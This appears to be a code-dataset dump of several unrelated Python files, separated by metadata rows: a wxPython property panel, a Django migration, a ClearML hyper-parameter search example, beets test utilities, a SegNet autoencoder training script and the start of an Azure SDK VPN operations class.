propUI.bindFunc(self.editor.objectMgr.onEnterObjectPropUI,
self.editor.objectMgr.onLeaveObjectPropUI,
lambda p0=None, p1=obj: self.editor.objectMgr.updateObjectAnimFromUI(p0, p1))
self.lookPane.SetSizer(sizer)
self.propsPane = wx.Panel(self.nb, -1, name='Properties')
self.nb.AddPage(self.propsPane, 'Properties')
sizer = wx.BoxSizer(wx.VERTICAL)
propNames = objDef.orderedProperties[:]
for key in list(objDef.properties.keys()):
if key not in propNames:
propNames.append(key)
for key in propNames:
# handling properties mask
propMask = BitMask32()
for modeKey in list(objDef.propertiesMask.keys()):
if key in objDef.propertiesMask[modeKey]:
propMask |= modeKey
if not propMask.isZero():
if (self.editor.mode & propMask).isZero():
continue
propDef = objDef.properties[key]
propType = propDef[OG.PROP_TYPE]
propDataType = propDef[OG.PROP_DATATYPE]
value = obj[OG.OBJ_PROP].get(key)
if propType == OG.PROP_UI_ENTRY:
propUI = ObjectPropUIEntry(self.propsPane, key)
propUI.setValue(value)
sizer.Add(propUI)
elif propType == OG.PROP_UI_SLIDE:
if len(propDef) <= OG.PROP_RANGE:
continue
propRange = propDef[OG.PROP_RANGE]
if value is None:
continue
if propDataType != OG.PROP_FLOAT:
value = float(value)
propUI = ObjectPropUISlider(self.propsPane, key, value, propRange[OG.RANGE_MIN], propRange[OG.RANGE_MAX])
sizer.Add(propUI)
elif propType == OG.PROP_UI_SPIN:
if len(propDef) <= OG.PROP_RANGE:
continue
propRange = propDef[OG.PROP_RANGE]
if value is None:
continue
propUI = ObjectPropUISpinner(self.propsPane, key, value, propRange[OG.RANGE_MIN], propRange[OG.RANGE_MAX])
sizer.Add(propUI)
elif propType == OG.PROP_UI_CHECK:
if value is None:
continue
propUI = ObjectPropUICheck(self.propsPane, key, value)
sizer.Add(propUI)
elif propType == OG.PROP_UI_RADIO:
if len(propDef) <= OG.PROP_RANGE:
continue
propRange = propDef[OG.PROP_RANGE]
if value is None:
continue
if propDataType != OG.PROP_STR:
for i in range(len(propRange)):
propRange[i] = str(propRange[i])
value = str(value)
propUI = ObjectPropUIRadio(self.propsPane, key, value, propRange)
sizer.Add(propUI)
elif propType == OG.PROP_UI_COMBO:
if len(propDef) <= OG.PROP_RANGE:
continue
propRange = propDef[OG.PROP_RANGE]
if value is None:
continue
if propDataType != OG.PROP_STR:
for i in range(len(propRange)):
propRange[i] = str(propRange[i])
value = str(value)
propUI = ObjectPropUICombo(self.propsPane, key, value, propRange)
sizer.Add(propUI)
elif propType == OG.PROP_UI_COMBO_DYNAMIC:
if len(propDef) <= OG.PROP_DYNAMIC_KEY:
continue
propDynamicKey = propDef[OG.PROP_DYNAMIC_KEY]
if propDynamicKey == OG.PROP_MODEL:
dynamicRangeKey = obj[OG.OBJ_MODEL]
else:
dynamicRangeKey = obj[OG.OBJ_PROP].get(propDynamicKey)
if dynamicRangeKey is None:
self.editor.objectMgr.updateObjectPropValue(obj, key, propDef[OG.PROP_DEFAULT], fUndo=False)
continue
propRange = propDef[OG.PROP_RANGE].get(dynamicRangeKey)
if propRange is None:
self.editor.objectMgr.updateObjectPropValue(obj, key, propDef[OG.PROP_DEFAULT], fUndo=False)
continue
if value is None:
continue
if propDataType != OG.PROP_STR:
for i in range(len(propRange)):
propRange[i] = str(propRange[i])
value = str(value)
if value not in propRange:
value = propRange[0]
self.editor.objectMgr.updateObjectPropValue(obj, key, value, fUndo=False)
propUI = ObjectPropUICombo(self.propsPane, key, value, propRange)
sizer.Add(propUI)
elif propType == OG.PROP_UI_TIME:
if value is None:
continue
propUI = ObjectPropUITime(self.propsPane, key, value)
sizer.Add(propUI)
else:
# unspported property type
continue
propUI.bindFunc(self.editor.objectMgr.onEnterObjectPropUI,
self.editor.objectMgr.onLeaveObjectPropUI,
lambda p0=None, p1=obj, p2=key: self.editor.objectMgr.updateObjectProperty(p0, p1, p2))
self.propsPane.SetSizer(sizer);
self.Layout()
self.SetupScrolling(self, scroll_y = True, rate_y = 20)
if self.lastPropTab == 'Transform':
self.nb.SetSelection(0)
elif self.lastPropTab == 'Look':
self.nb.SetSelection(1)
elif self.lastPropTab == 'Properties':
self.nb.SetSelection(2)
| 38.546012 | 135 | 0.601186 |
3bdbc57e6c9160968d901e24d36de53e168f646a | 1,454 | py | Python | quiz/migrations/0002_auto_20170613_1345.py | mblacklock/sohkahtoa | 89623b436dc1adf482308f22aa1eba81db343fde | [
"MIT"
] | null | null | null | quiz/migrations/0002_auto_20170613_1345.py | mblacklock/sohkahtoa | 89623b436dc1adf482308f22aa1eba81db343fde | [
"MIT"
] | null | null | null | quiz/migrations/0002_auto_20170613_1345.py | mblacklock/sohkahtoa | 89623b436dc1adf482308f22aa1eba81db343fde | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-06-13 12:45
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('topics', '0001_initial'),
('quiz', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('object_id', models.PositiveIntegerField()),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
],
),
migrations.CreateModel(
name='TopicQuiz',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('out_of', models.IntegerField()),
('topic', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='topics.Topic')),
],
options={
'verbose_name_plural': 'Topic Quizzes',
},
),
migrations.AlterModelOptions(
name='subtopicquiz',
options={'verbose_name_plural': 'Subtopic Quizzes'},
),
]
| 34.619048 | 128 | 0.585282 |
0553108a51f48b2d5a6526aa436c0041a1bafe4e | 6,632 | py | Python | examples/optimization/hyper-parameter-optimization/hyper_parameter_optimizer.py | thepycoder/clearml | 717edba8c2b39fb7486bd2aba9ca0294f309b4c3 | [
"Apache-2.0"
] | 2,097 | 2019-06-11T14:36:25.000Z | 2020-12-21T03:52:59.000Z | examples/optimization/hyper-parameter-optimization/hyper_parameter_optimizer.py | thepycoder/clearml | 717edba8c2b39fb7486bd2aba9ca0294f309b4c3 | [
"Apache-2.0"
] | 247 | 2019-06-11T15:10:26.000Z | 2020-12-21T17:34:32.000Z | examples/optimization/hyper-parameter-optimization/hyper_parameter_optimizer.py | thepycoder/clearml | 717edba8c2b39fb7486bd2aba9ca0294f309b4c3 | [
"Apache-2.0"
] | 256 | 2019-06-11T14:36:28.000Z | 2020-12-18T08:32:47.000Z | import logging
from clearml import Task
from clearml.automation import (
DiscreteParameterRange, HyperParameterOptimizer, RandomSearch,
UniformIntegerParameterRange)
# trying to load Bayesian optimizer package
try:
from clearml.automation.optuna import OptimizerOptuna # noqa
aSearchStrategy = OptimizerOptuna
except ImportError as ex:
try:
from clearml.automation.hpbandster import OptimizerBOHB # noqa
aSearchStrategy = OptimizerBOHB
except ImportError as ex:
logging.getLogger().warning(
'Apologies, it seems you do not have \'optuna\' or \'hpbandster\' installed, '
'we will be using RandomSearch strategy instead')
aSearchStrategy = RandomSearch
def job_complete_callback(
job_id, # type: str
objective_value, # type: float
objective_iteration, # type: int
job_parameters, # type: dict
top_performance_job_id # type: str
):
print('Job completed!', job_id, objective_value, objective_iteration, job_parameters)
if job_id == top_performance_job_id:
print('WOOT WOOT we broke the record! Objective reached {}'.format(objective_value))
# Connecting ClearML with the current process,
# from here on everything is logged automatically
task = Task.init(project_name='Hyper-Parameter Optimization',
task_name='Automatic Hyper-Parameter Optimization',
task_type=Task.TaskTypes.optimizer,
reuse_last_task_id=False)
# experiment template to optimize in the hyper-parameter optimization
args = {
'template_task_id': None,
'run_as_service': False,
}
args = task.connect(args)
# Get the template task experiment that we want to optimize
if not args['template_task_id']:
args['template_task_id'] = Task.get_task(
project_name='examples', task_name='Keras HP optimization base').id
# Set default queue name for the Training tasks themselves.
# later can be overridden in the UI
execution_queue = '1xGPU'
# Example use case:
an_optimizer = HyperParameterOptimizer(
# This is the experiment we want to optimize
base_task_id=args['template_task_id'],
# here we define the hyper-parameters to optimize
# Notice: The parameter name should exactly match what you see in the UI: <section_name>/<parameter>
# For Example, here we see in the base experiment a section Named: "General"
# under it a parameter named "batch_size", this becomes "General/batch_size"
# If you have `argparse` for example, then arguments will appear under the "Args" section,
# and you should instead pass "Args/batch_size"
hyper_parameters=[
UniformIntegerParameterRange('General/layer_1', min_value=128, max_value=512, step_size=128),
UniformIntegerParameterRange('General/layer_2', min_value=128, max_value=512, step_size=128),
DiscreteParameterRange('General/batch_size', values=[96, 128, 160]),
DiscreteParameterRange('General/epochs', values=[30]),
],
# this is the objective metric we want to maximize/minimize
objective_metric_title='epoch_accuracy',
objective_metric_series='epoch_accuracy',
# now we decide if we want to maximize it or minimize it (accuracy we maximize)
objective_metric_sign='max',
# let us limit the number of concurrent experiments,
# this in turn will make sure we do dont bombard the scheduler with experiments.
# if we have an auto-scaler connected, this, by proxy, will limit the number of machine
max_number_of_concurrent_tasks=2,
# this is the optimizer class (actually doing the optimization)
# Currently, we can choose from GridSearch, RandomSearch or OptimizerBOHB (Bayesian optimization Hyper-Band)
# more are coming soon...
optimizer_class=aSearchStrategy,
# Select an execution queue to schedule the experiments for execution
execution_queue=execution_queue,
# If specified all Tasks created by the HPO process will be created under the `spawned_project` project
spawn_project=None, # 'HPO spawn project',
# If specified only the top K performing Tasks will be kept, the others will be automatically archived
save_top_k_tasks_only=None, # 5,
# Optional: Limit the execution time of a single experiment, in minutes.
# (this is optional, and if using OptimizerBOHB, it is ignored)
time_limit_per_job=10.,
# Check the experiments every 12 seconds is way too often, we should probably set it to 5 min,
# assuming a single experiment is usually hours...
pool_period_min=0.2,
# set the maximum number of jobs to launch for the optimization, default (None) unlimited
# If OptimizerBOHB is used, it defined the maximum budget in terms of full jobs
# basically the cumulative number of iterations will not exceed total_max_jobs * max_iteration_per_job
total_max_jobs=10,
# set the minimum number of iterations for an experiment, before early stopping.
# Does not apply for simple strategies such as RandomSearch or GridSearch
min_iteration_per_job=10,
# Set the maximum number of iterations for an experiment to execute
# (This is optional, unless using OptimizerBOHB where this is a must)
max_iteration_per_job=30,
)
# if we are running as a service, just enqueue ourselves into the services queue and let it run the optimization
if args['run_as_service']:
# if this code is executed by `clearml-agent` the function call does nothing.
# if executed locally, the local process will be terminated, and a remote copy will be executed instead
task.execute_remotely(queue_name='services', exit_process=True)
# report every 12 seconds, this is way too often, but we are testing here J
an_optimizer.set_report_period(2.2)
# start the optimization process, callback function to be called every time an experiment is completed
# this function returns immediately
an_optimizer.start(job_complete_callback=job_complete_callback)
# You can also use the line below instead to run all the optimizer tasks locally, without using queues or agent
# an_optimizer.start_locally(job_complete_callback=job_complete_callback)
# set the time limit for the optimization process (2 hours)
an_optimizer.set_time_limit(in_minutes=120.0)
# wait until process is done (notice we are controlling the optimization process in the background)
an_optimizer.wait()
# optimization is completed, print the top performing experiments id
top_exp = an_optimizer.get_top_experiments(top_k=3)
print([t.id for t in top_exp])
# make sure background optimization stopped
an_optimizer.stop()
print('We are done, good bye')
| 49.125926 | 112 | 0.747889 |
11f71a6318c743f31c72209074768be4f9cfc783 | 9,757 | py | Python | test/_common.py | awesome-archive/beets | 44f33cabc7e2c5ea6fd79fac3b73ac54fa11d568 | [
"MIT"
] | null | null | null | test/_common.py | awesome-archive/beets | 44f33cabc7e2c5ea6fd79fac3b73ac54fa11d568 | [
"MIT"
] | null | null | null | test/_common.py | awesome-archive/beets | 44f33cabc7e2c5ea6fd79fac3b73ac54fa11d568 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Some common functionality for beets' test cases."""
from __future__ import division, absolute_import, print_function
import time
import sys
import os
import tempfile
import shutil
import six
import unittest
from contextlib import contextmanager
# Mangle the search path to include the beets sources.
sys.path.insert(0, '..')
import beets.library # noqa: E402
from beets import importer, logging # noqa: E402
from beets.ui import commands # noqa: E402
from beets import util # noqa: E402
import beets # noqa: E402
# Make sure the development versions of the plugins are used
import beetsplug # noqa: E402
beetsplug.__path__ = [os.path.abspath(
os.path.join(__file__, '..', '..', 'beetsplug')
)]
# Test resources path.
RSRC = util.bytestring_path(os.path.join(os.path.dirname(__file__), 'rsrc'))
PLUGINPATH = os.path.join(os.path.dirname(__file__), 'rsrc', 'beetsplug')
# Propagate to root loger so nosetest can capture it
log = logging.getLogger('beets')
log.propagate = True
log.setLevel(logging.DEBUG)
# Dummy item creation.
_item_ident = 0
# OS feature test.
HAVE_SYMLINK = sys.platform != 'win32'
def item(lib=None):
global _item_ident
_item_ident += 1
i = beets.library.Item(
title=u'the title',
artist=u'the artist',
albumartist=u'the album artist',
album=u'the album',
genre=u'the genre',
composer=u'the composer',
grouping=u'the grouping',
year=1,
month=2,
day=3,
track=4,
tracktotal=5,
disc=6,
disctotal=7,
lyrics=u'the lyrics',
comments=u'the comments',
bpm=8,
comp=True,
path='somepath{0}'.format(_item_ident),
length=60.0,
bitrate=128000,
format='FLAC',
mb_trackid='someID-1',
mb_albumid='someID-2',
mb_artistid='someID-3',
mb_albumartistid='someID-4',
album_id=None,
)
if lib:
lib.add(i)
return i
_album_ident = 0
def album(lib=None):
global _item_ident
_item_ident += 1
i = beets.library.Album(
artpath=None,
albumartist=u'some album artist',
albumartist_sort=u'some sort album artist',
albumartist_credit=u'some album artist credit',
album=u'the album',
genre=u'the genre',
year=2014,
month=2,
day=5,
tracktotal=0,
disctotal=1,
comp=False,
mb_albumid='someID-1',
mb_albumartistid='someID-1'
)
if lib:
lib.add(i)
return i
# Dummy import session.
def import_session(lib=None, loghandler=None, paths=[], query=[], cli=False):
cls = commands.TerminalImportSession if cli else importer.ImportSession
return cls(lib, loghandler, paths, query)
class Assertions(object):
"""A mixin with additional unit test assertions."""
def assertExists(self, path): # noqa
self.assertTrue(os.path.exists(util.syspath(path)),
u'file does not exist: {!r}'.format(path))
def assertNotExists(self, path): # noqa
self.assertFalse(os.path.exists(util.syspath(path)),
u'file exists: {!r}'.format((path)))
def assert_equal_path(self, a, b):
"""Check that two paths are equal."""
self.assertEqual(util.normpath(a), util.normpath(b),
u'paths are not equal: {!r} and {!r}'.format(a, b))
# A test harness for all beets tests.
# Provides temporary, isolated configuration.
class TestCase(unittest.TestCase, Assertions):
"""A unittest.TestCase subclass that saves and restores beets'
global configuration. This allows tests to make temporary
modifications that will then be automatically removed when the test
completes. Also provides some additional assertion methods, a
temporary directory, and a DummyIO.
"""
def setUp(self):
# A "clean" source list including only the defaults.
beets.config.sources = []
beets.config.read(user=False, defaults=True)
# Direct paths to a temporary directory. Tests can also use this
# temporary directory.
self.temp_dir = util.bytestring_path(tempfile.mkdtemp())
beets.config['statefile'] = \
util.py3_path(os.path.join(self.temp_dir, b'state.pickle'))
beets.config['library'] = \
util.py3_path(os.path.join(self.temp_dir, b'library.db'))
beets.config['directory'] = \
util.py3_path(os.path.join(self.temp_dir, b'libdir'))
# Set $HOME, which is used by confit's `config_dir()` to create
# directories.
self._old_home = os.environ.get('HOME')
os.environ['HOME'] = util.py3_path(self.temp_dir)
# Initialize, but don't install, a DummyIO.
self.io = DummyIO()
def tearDown(self):
if os.path.isdir(self.temp_dir):
shutil.rmtree(self.temp_dir)
if self._old_home is None:
del os.environ['HOME']
else:
os.environ['HOME'] = self._old_home
self.io.restore()
beets.config.clear()
beets.config._materialized = False
class LibTestCase(TestCase):
"""A test case that includes an in-memory library object (`lib`) and
an item added to the library (`i`).
"""
def setUp(self):
super(LibTestCase, self).setUp()
self.lib = beets.library.Library(':memory:')
self.i = item(self.lib)
def tearDown(self):
self.lib._connection().close()
super(LibTestCase, self).tearDown()
# Mock timing.
class Timecop(object):
"""Mocks the timing system (namely time() and sleep()) for testing.
Inspired by the Ruby timecop library.
"""
def __init__(self):
self.now = time.time()
def time(self):
return self.now
def sleep(self, amount):
self.now += amount
def install(self):
self.orig = {
'time': time.time,
'sleep': time.sleep,
}
time.time = self.time
time.sleep = self.sleep
def restore(self):
time.time = self.orig['time']
time.sleep = self.orig['sleep']
# Mock I/O.
class InputException(Exception):
def __init__(self, output=None):
self.output = output
def __str__(self):
msg = "Attempt to read with no input provided."
if self.output is not None:
msg += " Output: {!r}".format(self.output)
return msg
class DummyOut(object):
encoding = 'utf-8'
def __init__(self):
self.buf = []
def write(self, s):
self.buf.append(s)
def get(self):
if six.PY2:
return b''.join(self.buf)
else:
return ''.join(self.buf)
def flush(self):
self.clear()
def clear(self):
self.buf = []
class DummyIn(object):
encoding = 'utf-8'
def __init__(self, out=None):
self.buf = []
self.reads = 0
self.out = out
def add(self, s):
if six.PY2:
self.buf.append(s + b'\n')
else:
self.buf.append(s + '\n')
def readline(self):
if not self.buf:
if self.out:
raise InputException(self.out.get())
else:
raise InputException()
self.reads += 1
return self.buf.pop(0)
class DummyIO(object):
"""Mocks input and output streams for testing UI code."""
def __init__(self):
self.stdout = DummyOut()
self.stdin = DummyIn(self.stdout)
def addinput(self, s):
self.stdin.add(s)
def getoutput(self):
res = self.stdout.get()
self.stdout.clear()
return res
def readcount(self):
return self.stdin.reads
def install(self):
sys.stdin = self.stdin
sys.stdout = self.stdout
def restore(self):
sys.stdin = sys.__stdin__
sys.stdout = sys.__stdout__
# Utility.
def touch(path):
open(path, 'a').close()
class Bag(object):
"""An object that exposes a set of fields given as keyword
arguments. Any field not found in the dictionary appears to be None.
Used for mocking Album objects and the like.
"""
def __init__(self, **fields):
self.fields = fields
def __getattr__(self, key):
return self.fields.get(key)
# Platform mocking.
@contextmanager
def platform_windows():
import ntpath
old_path = os.path
try:
os.path = ntpath
yield
finally:
os.path = old_path
@contextmanager
def platform_posix():
import posixpath
old_path = os.path
try:
os.path = posixpath
yield
finally:
os.path = old_path
@contextmanager
def system_mock(name):
import platform
old_system = platform.system
platform.system = lambda: name
try:
yield
finally:
platform.system = old_system
def slow_test(unused=None):
def _id(obj):
return obj
if 'SKIP_SLOW_TESTS' in os.environ:
return unittest.skip(u'test is slow')
return _id
| 25.880637 | 77 | 0.617095 |
7ffefce93f6cbce99a01464901f32df78ef85c94 | 618 | py | Python | tests/test_xbert_preprocessing.py | simonlevine/x-transformer-icd | 17d0a84f8b8e1f69623a82c0afab26830c7a1eb8 | [
"BSD-3-Clause"
] | 1 | 2020-12-15T00:55:25.000Z | 2020-12-15T00:55:25.000Z | tests/test_xbert_preprocessing.py | simonlevine/x-transformer-icd | 17d0a84f8b8e1f69623a82c0afab26830c7a1eb8 | [
"BSD-3-Clause"
] | null | null | null | tests/test_xbert_preprocessing.py | simonlevine/x-transformer-icd | 17d0a84f8b8e1f69623a82c0afab26830c7a1eb8 | [
"BSD-3-Clause"
] | null | null | null | import pytest
from pipeline import xbert_preprocessing as xp
@pytest.mark.unit
@pytest.mark.parametrize("label_raw,label_expected", [
("Tuberculous peritonitis",
"Tuberculous peritonitis"),
("Tuberculosis of eye, unspecified",
"Tuberculosis of eye unspecified"),
("Tuberculosis of (inner) (middle) ear",
"Tuberculosis of (inner) (middle) ear"),
("Chronic myeloid leukemia, BCR/ABL-positive, in relapse",
"Chronic myeloid leukemia BCR ABL-positive in relapse")
])
def test_xbert_clean_label(label_raw, label_expected):
assert xp.xbert_clean_label(label_raw) == label_expected | 38.625 | 62 | 0.73301 |
f30b141a1a5e5b344bee1f2ffcc16c56ea54a698 | 505 | py | Python | teams/forms.py | ZendaInnocent/django_saas | dc977f2eb26f4d82134b3f354989591265eef9ba | [
"MIT"
] | 4 | 2020-10-13T09:34:58.000Z | 2022-02-11T11:31:19.000Z | teams/forms.py | ZendaInnocent/django_saas | dc977f2eb26f4d82134b3f354989591265eef9ba | [
"MIT"
] | 24 | 2020-10-15T10:41:31.000Z | 2021-09-22T19:37:11.000Z | teams/forms.py | ZendaInnocent/django_saas | dc977f2eb26f4d82134b3f354989591265eef9ba | [
"MIT"
] | 5 | 2020-10-12T16:41:10.000Z | 2022-02-02T14:56:15.000Z | from django import forms
from django.contrib.auth import get_user_model
from accounts.forms import SignUpForm
User = get_user_model()
class CreateTeamForm(SignUpForm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['password1'].widget = forms.HiddenInput()
self.fields['password2'].widget = forms.HiddenInput()
class UpdateTeamForm(forms.ModelForm):
class Meta:
model = User
fields = ['name', 'email', 'phone', ]
| 22.954545 | 61 | 0.679208 |
8061d5a4acfb1ca2ea97095893e8c65de383dc0a | 25 | py | Python | package/subpack/bar.py | alexanderzimmerman/python-package | d4c67fc0dea8e902b997eca4a1d5aac736162d82 | [
"MIT"
] | 1 | 2018-11-27T11:02:43.000Z | 2018-11-27T11:02:43.000Z | package/subpack/bar.py | alexanderzimmerman/python-package | d4c67fc0dea8e902b997eca4a1d5aac736162d82 | [
"MIT"
] | null | null | null | package/subpack/bar.py | alexanderzimmerman/python-package | d4c67fc0dea8e902b997eca4a1d5aac736162d82 | [
"MIT"
] | null | null | null | print("Hello, I'm Bar!")
| 12.5 | 24 | 0.6 |
01b260091211df2efba53b190a074d75885bda73 | 7,048 | py | Python | train.py | smbadiwe/Autoencoder | 54986e9d3b94d24c87ff4269d98dbf458ca16998 | [
"Apache-2.0"
] | null | null | null | train.py | smbadiwe/Autoencoder | 54986e9d3b94d24c87ff4269d98dbf458ca16998 | [
"Apache-2.0"
] | null | null | null | train.py | smbadiwe/Autoencoder | 54986e9d3b94d24c87ff4269d98dbf458ca16998 | [
"Apache-2.0"
] | null | null | null | import time
import torch.optim as optim
from torch import nn
from torch.utils.data import DataLoader
from data_gen import VaeDataset
from models import SegNet
from utils import *
EPS = 1e-12
def mse_loss(y_pred, y_true):
return (y_pred - y_true).pow(2).mean()
def rmse_loss(y_pred, y_true):
return torch.sqrt((y_pred - y_true).pow(2).mean())
def dis_loss(y_pred, y_true):
"""
Itakura-Saito distance, using mean instead of sum
:param y_pred:
:param y_true:
:return:
"""
# set log(0) and x/0 to 0.
mask = torch.ones(y_pred.size(), dtype=torch.float32, device=device)
mask[y_pred == 0] = 0.0
mask[y_true == 0] = 0.0
k_i = y_pred / (y_true + EPS)
result = (mask * (k_i - torch.log(k_i + EPS) - 1)).mean()
return result
def i_div_loss(y_pred, y_true):
"""
I-divergence, using mean instead of sum
:param y_pred:
:param y_true:
:return:
"""
# set log(0) and x/0 to 0.
mask = torch.ones(y_pred.size(), dtype=torch.float32, device=device)
mask[y_pred == 0] = 0.0
k_i = y_pred / (y_true + EPS)
return (y_true * mask * (k_i - torch.log(k_i + EPS) - 1)).mean()
losses_dict = {
"mse": mse_loss,
"rmse": rmse_loss,
"idiv": i_div_loss,
"dis": dis_loss
}
def train(epoch, train_loader, model, optimizer, loss_fn):
# Ensure dropout layers are in train mode
model.train()
# Loss function
# criterion = nn.KLDivLoss.MSELoss().to(device)
batch_time = ExpoAverageMeter() # forward prop. + back prop. time
losses = ExpoAverageMeter() # loss (per word decoded)
start = time.time()
n_train = len(train_loader)
loss_function = losses_dict[loss_fn]
# Batches
for i_batch, (x, y) in enumerate(train_loader):
# Set device options
x = x.to(device)
y = y.to(device)
# print('x.size(): ' + str(x.size())) # [32, 3, 224, 224]
# print('y.size(): ' + str(y.size())) # [32, 3, 224, 224]
# Zero gradients
optimizer.zero_grad()
y_hat = model(x)
# print('y_hat.size(): ' + str(y_hat.size())) # [32, 3, 224, 224]
loss = loss_function(y_hat, y)
loss.backward()
# def closure():
# optimizer.zero_grad()
# y_hat = model(x)
# loss = torch.sqrt((y_hat - y).pow(2).mean())
# loss.backward()
# losses.update(loss.item())
# return loss
# optimizer.step(closure)
optimizer.step()
# Keep track of metrics
# losses.update(loss.item())
losses.update(loss)
batch_time.update(time.time() - start)
start = time.time()
# Print status
if i_batch % print_freq == 0:
print('Epoch: [{epoch}][{i_batch}/{0}]\t'
'Batch Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'{loss_fn} Loss {loss.val:.4f} ({loss.avg:.4f})\t'.format(n_train, epoch=epoch,
i_batch=i_batch, loss_fn=loss_fn,
batch_time=batch_time, loss=losses))
def valid(val_loader, model, loss_fn):
model.eval() # eval mode (no dropout or batchnorm)
# Loss function
# criterion = nn.MSELoss().to(device)
batch_time = ExpoAverageMeter() # forward prop. + back prop. time
losses = ExpoAverageMeter() # loss (per word decoded)
start = time.time()
loss_function = losses_dict[loss_fn]
with torch.no_grad():
# Batches
for i_batch, (x, y) in enumerate(val_loader):
# Set device options
x = x.to(device)
y = y.to(device)
y_hat = model(x)
loss = loss_function(y_hat, y)
# Keep track of metrics
losses.update(loss.item())
batch_time.update(time.time() - start)
start = time.time()
# Print status
if i_batch % print_freq == 0:
print('Validation: [{0}/{1}]\t'
'Batch Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'{2} Loss {loss.val:.4f} ({loss.avg:.4f})\t'.format(i_batch, len(val_loader), loss_fn,
batch_time=batch_time, loss=losses))
return losses.avg
def main(loss_fn, shrink=0):
start = get_last_saved_checkpoint_number(loss_fn=loss_fn, shrink=shrink)
if start >= epochs:
print(f"{loss_fn} | {shrink} - The last epoch [{epochs}] has already been completed")
return None
train_loader = DataLoader(dataset=VaeDataset('train'), batch_size=batch_size, shuffle=True,
pin_memory=True, drop_last=True)
val_loader = DataLoader(dataset=VaeDataset('valid'), batch_size=batch_size, shuffle=False,
pin_memory=True, drop_last=True)
# Create SegNet model
label_nbr = 3
model = SegNet(n_classes=label_nbr, shrink=shrink)
n_gpus = torch.cuda.device_count()
if n_gpus == 0:
print(f"{loss_fn} | {shrink} - !!! - Program is not using GPU. It'll run a lot slower")
if n_gpus > 1:
print(f"{loss_fn} | {shrink} - Let's use {n_gpus} GPUs!")
# dim = 0 [40, xxx] -> [10, ...], [10, ...], [10, ...], [10, ...] on 4 GPUs
model = nn.DataParallel(model)
# Use appropriate device
model = model.to(device)
# print(model)
# define the optimizer
# optimizer = optim.LBFGS(model.parameters(), lr=0.8)
optimizer = optim.Adam(model.parameters(), lr=lr)
best_loss = 9.e15
epochs_since_improvement = 0
print(f"{loss_fn} | {shrink} - Resuming from Epoch {start}")
# Epochs
for epoch in range(start, epochs):
# Decay learning rate if there is no improvement for 8 consecutive epochs, and terminate training after 20
# if epochs_since_improvement == 20:
# break
if epochs_since_improvement > 0 and epochs_since_improvement % 8 == 0:
adjust_learning_rate(optimizer, 0.8)
# One epoch's training
train(epoch=epoch, train_loader=train_loader, model=model, optimizer=optimizer, loss_fn=loss_fn)
# One epoch's validation
val_loss = valid(val_loader=val_loader, model=model, loss_fn=loss_fn)
print(f'\nSHRINK-{shrink} * {loss_fn} - LOSS - {val_loss:.3f}\n')
# Check if there was an improvement
is_best = val_loss < best_loss
if not is_best:
epochs_since_improvement += 1
print(f"\nSHRINK-{shrink} - Epochs since last improvement: {epochs_since_improvement}\n")
else:
epochs_since_improvement = 0
best_loss = val_loss
# Save checkpoint
save_checkpoint(epoch, model, optimizer, loss_fn, val_loss=val_loss, is_best=is_best, shrink=shrink)
if __name__ == '__main__':
sh, lf = get_shrink_value_and_loss_from_input()
main(loss_fn=lf, shrink=sh)
| 32.62963 | 114 | 0.579313 |
6940b37f066aece2ab75c252fa358446c8fe0a43 | 17,484 | py | Python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_04_01/operations/_vpn_connections_operations.py | iscai-msft/azure-sdk-for-python | 83715b95c41e519d5be7f1180195e2fba136fc0f | [
"MIT"
] | 1 | 2021-06-02T08:01:35.000Z | 2021-06-02T08:01:35.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_04_01/operations/_vpn_connections_operations.py | iscai-msft/azure-sdk-for-python | 83715b95c41e519d5be7f1180195e2fba136fc0f | [
"MIT"
] | 226 | 2019-07-24T07:57:21.000Z | 2019-10-15T01:07:24.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_04_01/operations/_vpn_connections_operations.py | iscai-msft/azure-sdk-for-python | 83715b95c41e519d5be7f1180195e2fba136fc0f | [
"MIT"
] | 1 | 2019-06-17T22:18:23.000Z | 2019-06-17T22:18:23.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class VpnConnectionsOperations(object):
"""VpnConnectionsOperations operations.
You should not instantiate directly this class, but create a Client instance that will create it for you and attach it as attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client API version. Constant value: "2018-04-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2018-04-01"
self.config = config
def get(
self, resource_group_name, gateway_name, connection_name, custom_headers=None, raw=False, **operation_config):
"""Retrieves the details of a vpn connection.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param connection_name: The name of the vpn connection.
:type connection_name: str
:param dict custom_headers: headers that will be added to the request
